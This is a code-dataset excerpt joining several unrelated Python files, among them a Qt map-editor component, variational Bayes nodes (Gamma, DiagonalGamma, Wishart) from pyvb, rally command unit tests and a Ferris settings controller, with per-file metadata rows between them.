# Rect rect = parent.get_position()
# CL_InputEvent ev2 = event
# ev2.mouse_pos = Point(CL_Mouse::get_x() - rect.left,
# CL_Mouse::get_y() - rect.top)
# workspace.key_up(InputEvent(ev2))
# }
# void
# EditorMapComponentImpl::draw ()
# {
# if (workspace.get_map().is_null()) return
# Display::push_cliprect(parent.get_screen_rect())
# Display::push_modelview()
# Display::add_translate(parent.get_screen_x(), parent.get_screen_y())
# // Update scrollbars (FIXME: move me to function)
# scrollbar_v.set_range(0, workspace.get_map().get_bounding_rect().height)
# scrollbar_v.set_pagesize(parent.height/gc_state.get_zoom())
# scrollbar_v.set_pos(gc_state.get_pos().y)
# scrollbar_h.set_range(0, workspace.get_map().get_bounding_rect().width)
# scrollbar_h.set_pagesize(parent.width/gc_state.get_zoom())
# scrollbar_h.set_pos(gc_state.get_pos().x)
# gc_state.push()
# {
# GraphicContext gc(gc_state, CL_Display::get_current_window().get_gc())
# workspace.draw(gc)
# }
# gc_state.pop()
# Display::pop_modelview()
# Display::pop_cliprect()
# }
# endif
def screen2world(self, pos):
return self.gc_state.screen2world(pos)
def set_zoom(self, z):
self.gc_state.set_zoom(z)
self.editormap_widget.repaint()
self.update_scrollbars()
def zoom_out(self, pos):
self.gc_state.set_zoom(self.gc_state.get_zoom() / 1.25,
Pointf(pos.x, pos.y))
self.editormap_widget.repaint()
self.update_scrollbars()
def zoom_in(self, pos):
self.gc_state.set_zoom(self.gc_state.get_zoom() * 1.25,
Pointf(pos.x, pos.y))
self.editormap_widget.repaint()
self.update_scrollbars()
def zoom_to(self, rect):
self.gc_state.zoom_to(rect)
self.editormap_widget.repaint()
self.update_scrollbars()
def get_clip_rect(self):
return self.gc_state.get_clip_rect()
def move_to(self, x, y):
self.gc_state.set_pos(Pointf(x, y))
self.editormap_widget.repaint()
self.update_scrollbars()
def move_to_x(self, x):
self.gc_state.set_pos(Pointf(x, self.gc_state.get_pos().y))
self.editormap_widget.repaint()
self.update_scrollbars()
def move_to_y(self, y):
self.gc_state.set_pos(Pointf(self.gc_state.get_pos().x, y))
self.editormap_widget.repaint()
self.update_scrollbars()
def sig_on_key(self, keyseq_str):
key_sequence = QKeySequence(keyseq_str)
if key_sequence.isEmpty():
raise RuntimeError("invalid key binding: '%s'" % keyseq_str)
shortcut = QShortcut(key_sequence, self.editormap_widget)
signal = Signal()
def on_key(*args):
pos = self.editormap_widget.mapFromGlobal(QCursor.pos())
# pos = self.gc_state.screen2world(Point.from_qt(pos))
signal(pos.x(), pos.y())
shortcut.activated.connect(on_key)
return signal
def get_gc_state(self):
return self.gc_state
def get_widget(self):
return self.tab_widget or self.widget
def update_scrollbars(self):
rect = self.workspace.get_map().get_bounding_rect()
border = 128
self.scroll_horz.setMinimum(rect.left - border)
self.scroll_horz.setMaximum(rect.right + border)
self.scroll_horz.setPageStep(self.editormap_widget.width())
self.scroll_horz.setSliderPosition(int(self.gc_state.get_pos().x))
self.scroll_vert.setMinimum(rect.top - border)
self.scroll_vert.setMaximum(rect.bottom + border)
self.scroll_vert.setPageStep(self.editormap_widget.height())
self.scroll_vert.setSliderPosition(int(self.gc_state.get_pos().y))
def set_sector_tab_label(self, index, text):
self.tab_widget.setTabText(index, "Sector \"%s\"" % text)
# EOF #
| gpl-3.0 | 6,706,988,355,870,626,000 | 31.211864 | 80 | 0.62181 | false | 3.357774 | false | false | false |
jameshensman/pyvb | src/pyvb/nodes/nodes_todo.py | 1 | 7789 | # -*- coding: utf-8 -*-
# Copyright 2009 James Hensman and Michael Dewar
# Licensed under the Gnu General Public license, see COPYING
import numpy as np
import node
from scipy import special #needed for calculating lower bound in Gamma, Wishart
class ConjugacyError(ValueError):
def __init__(self,message):
ValueError.__init__(self,message)
class hstack(node.Node):
"""A class to represent a Matrix whose columns are Normally distributed.
Arguments
----------
Attributes
----------
"""
def __init__(self,parents):
dims = [e.shape[0] for e in parents]
shape = (dims[0],len(parents))
node.Node.__init__(self, shape)
assert type(parents)==list
assert np.all(dims[0]==np.array(dims)),"dimensions incompatible"
self.parents = parents
self.shape = shape
[e.addChild(self) for e in self.parents]
def pass_down_Ex(self):
return np.hstack([e.pass_down_Ex() for e in self.parents])
def pass_down_ExxT(self):
""""""
return np.sum([p.pass_down_ExxT() for p in self.parents],0)
def pass_down_ExTx(self):
raise NotImplementedError
def pass_up_m1_m2(self,requester):
if self.shape[1] ==1:
#i'm a hstack of only _one_ vector.
# a corner case I guess...
child_messages = [c.pass_up_m1_m2(self) for c in self.children]
return sum([e[0] for e in child_messages]),sum([e[1] for e in child_messages])
#child messages consist of m1,m2,b,bbT
child_messages = [c.pass_up_m1_m2(self) for c in self.children]
i = self.parents.index(requester)
#here's m1 - \sum_{children} m1 bbT[i,i]
m1 = np.sum([m[0]*float(m[-1][i,i]) for m in child_messages],0)
#here's m2
m2 = np.zeros((self.shape[0],1))
m2 += sum([m[1]*float(m[2][i]) for m in child_messages])# TODO Shouldn;t this all be in the Multiplication node?
m2 -= sum([sum([np.dot(m[0]*m[-1][i,j],self.parents[j].pass_down_Ex()) for j in range(self.shape[1]) if not i==j]) for m in child_messages])
return m1,m2
class Transpose(node.Node):
def __init__(self,parent):
"""I'm designing this to sit between a Gaussian node.Node and a multiplication node.Node (for inner products)"""
assert isinstance(parent, Gaussian), "Can only transpose Gaussian node.Nodes..."
node.Node.__init__(self, shape)
self.parent = parent
self.shape = self.parent.shape[::-1]
parent.addChild(self)
def pass_down_Ex(self):
return self.parent.pass_down_Ex().T
def pass_down_ExxT(self):
return self.parent.pass_down_ExTx()
def pass_down_ExTx(self):
return self.parent.pass_down_ExxT()
def pass_up_m1_m2(self,requester):
child_messages = [c.pass_up_m1_m2(self) for a in self.children]
return np.sum([m[0] for m in child_messages],0),np.sum([m[1] for m in self.child_messages],0).T
class Gamma:
"""
A Class to represent a Gamma random variable in a VB network
Arguments
----------
dim - int
The dimension of the node (can be more than 1 - see notes)
a0 - float
The prior value of a
b0 - float
The prior value of b
Attributes
----------
qa - float
The (variational) posterior value of a
qb - float
The (variational) posterior value of b
Notes
----------
The dimensionality of a Gamma node can be more than 1: this is useful for representing univariate noise. The expected value of the node is then simply a diagonal matrix with each diagonal element set to qa/qb.
Gamma does not inherrit from node.Node because it cannot be added, muliplied etc"""
def __init__(self,dim,a0,b0):
self.shape = (dim,dim)
self.a0 = a0
self.b0 = b0
self.children = []
self.update_a()#initialise q to correct value
self.qb = np.random.rand()#randomly initialise solution
def addChild(self,child):
self.children.append(child)
self.update_a()#re-initialise q to correct value
def update_a(self):
self.qa = self.a0
for child in self.children:
self.qa += 0.5*child.shape[0]
def update(self):
"""
Notes
----------
We update only the 'b' parameter, since the 'a' parameter can be done in closed form and does not need to be iterated. Note the use of trace() allows for children whose shape is not (1,1)"""
self.qb = self.b0
for child in self.children:
self.qb += 0.5*np.trace(child.pass_down_ExxT()) + 0.5*np.trace(child.mean_parent.pass_down_ExxT()) - np.trace(np.dot(child.pass_down_Ex(),child.mean_parent.pass_down_Ex().T))
def pass_down_Ex(self):
"""Returns the expected value of the node"""
return np.eye(self.shape[0])*self.qa/self.qb
def pass_down_lndet(self):
"""Return the log of the determinant of the expected value of this node"""
#return np.log(np.power(self.qa/self.qb,self.shape[0]))
return self.shape[0]*(np.log(self.qa) - np.log(self.qb))
def log_lower_bound(self):
"""Return this node's contribution to the log of the lower bound on the model evidence. """
Elnx = special.digamma(self.qa)-np.log(self.qb)#expected value of the log of this node
#terms in joint prob not covered by child nodes:
ret = (self.a0-1)*Elnx - special.gammaln(self.a0) + self.a0*np.log(self.b0) - self.b0*(self.qa/self.qb)
#entropy terms:
ret -= (self.qa-1)*Elnx - special.gammaln(self.qa) + self.qa*np.log(self.qb) - self.qb*(self.qa/self.qb)
return ret
class DiagonalGamma:
"""A class to implemet a diagonal prior for a multivariate (diagonal) Gaussian. Effectively a series of Gamma distributions
Arguments
----------
Attributes
----------
"""
def __init__(self,dim,a0s,b0s):
self.shape = (dim,dim)
assert a0s.size==self.shape[0]
assert b0s.size==self.shape[0]
self.a0s = a0s.flatten()
self.b0s = b0s.flatten()
self.children = []
self.update_a()#initialise q to correct value
self.qb = np.random.rand()#randomly initialise solution
def addChild(self,child):
assert child.shape == (self.shape[0],1)
self.children.append(child)
self.update_a()
def update_a(self):
self.qa = self.a0s.copy()
for child in self.children:
self.qa += 0.5
def update(self):
self.qb = self.b0s.copy()
for child in self.children:
self.qb += 0.5*np.diag(child.pass_down_ExxT()) + 0.5*np.diag(child.mean_parent.pass_down_ExxT()) - np.diag(np.dot(child.pass_down_Ex(),child.mean_parent.pass_down_Ex().T))
def pass_down_Ex(self):
return np.diag(self.qa/self.qb)
def pass_down_lndet(self):
"""Return the log of the determinant of the expected value of this node"""
return np.log(np.prod(self.qa/self.qb))
def log_lower_bound(self):
Elnx = special.digamma(self.qa)-np.log(self.qb)#expected value of the log of this node
#terms in joint prob not covered by child nodes:
ret = (self.a0s-1)*Elnx - special.gammaln(self.a0s) + self.a0s*np.log(self.b0s) - self.b0s*(self.qa/self.qb)
ret -= (self.qa-1)*Elnx - special.gammaln(self.qa) + self.qa*np.log(self.qb) - self.qb*(self.qa/self.qb)#entropy terms
return sum(ret)
class Wishart:
""" A wishart random variable: the conjugate prior to the precision of a (full) multivariate Gaussian distribution"""
def __init__(self,dim,v0,w0):
self.shape = (dim,dim)
assert w0.shape==self.shape
self.v0 = v0
self.w0 = w0
self.children = []
self.update_v()#initialise qv to correct value
#randomly initialise solution (for qw)
l = np.random.randn(self.shape[0],1)#randomly initialise solution
self.qw = np.dot(l,l.T)
def addChild(self,child):
assert child.shape == (self.shape[0],1)
self.children.append(child)
self.update_v()
def update_v(self):
self.qv = self.v0
for child in self.children:
self.qv += 0.5
def update(self):
self.qw = self.w0
for child in self.children:
self.qw += 0.5*child.pass_down_ExxT() + 0.5*child.mean_parent.pass_down_ExxT() - np.dot(child.pass_down_Ex(),child.mean_parent.pass_down_Ex().T)
def pass_down_Ex(self):
return self.qv*np.linalg.inv(self.qw)
| gpl-3.0 | -6,679,971,533,538,718,000 | 31.323651 | 212 | 0.673899 | false | 2.771886 | false | false | false |
varunarya10/rally | tests/unit/cmd/test_manage.py | 2 | 1958 | # Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import mock
from rally.cmd import manage
from tests.unit import test
class CmdManageTestCase(test.TestCase):
@mock.patch("rally.cmd.manage.cliutils")
def test_main(self, cli_mock):
manage.main()
categories = {"db": manage.DBCommands,
"tempest": manage.TempestCommands}
cli_mock.run.assert_called_once_with(sys.argv, categories)
class DBCommandsTestCase(test.TestCase):
def setUp(self):
super(DBCommandsTestCase, self).setUp()
self.db_commands = manage.DBCommands()
@mock.patch("rally.cmd.manage.db")
def test_recreate(self, mock_db):
self.db_commands.recreate()
calls = [mock.call.db_drop(), mock.call.db_create()]
self.assertEqual(calls, mock_db.mock_calls)
class TempestCommandsTestCase(test.TestCase):
def setUp(self):
super(TempestCommandsTestCase, self).setUp()
self.tempest_commands = manage.TempestCommands()
self.tempest = mock.Mock()
@mock.patch("rally.cmd.manage.api")
def test_install(self, mock_api):
deployment_uuid = "deployment_uuid"
self.tempest_commands.install(deployment_uuid)
mock_api.Verification.install_tempest.assert_called_once_with(
deployment_uuid, None)
| apache-2.0 | -3,202,771,024,890,421,000 | 32.186441 | 78 | 0.670072 | false | 3.824219 | true | false | false |
markEarvin/password-tracker | plugins/settings/controllers/settings.py | 1 | 1102 | import ferris
from ..models.setting import Setting
import datetime
from google.appengine.api import memcache
class Settings(ferris.Controller):
class Meta:
prefixes = ('admin',)
components = (ferris.scaffold.Scaffolding,)
Model = Setting
def startup(self):
self.context['setting_classes'] = Setting.get_classes()
def admin_list(self):
self.context['settings'] = ferris.settings.settings()
def admin_edit(self, key):
model = Setting.factory(key)
instance = model.get_instance(static_settings=ferris.settings.settings())
self.meta.Model = model
self.scaffold.ModelForm = ferris.model_form(model)
self.context['settings_class'] = model
def reload_settings(**kwargs):
self.components.flash_messages('Settings saved, however, the settings may not be updated on all instances. You may have to restart instances for the settings to take effect.', 'warning')
self.events.scaffold_after_save += reload_settings
return ferris.scaffold.edit(self, instance.key.urlsafe())
| mit | 8,638,258,176,234,224,000 | 32.393939 | 198 | 0.680581 | false | 4.190114 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.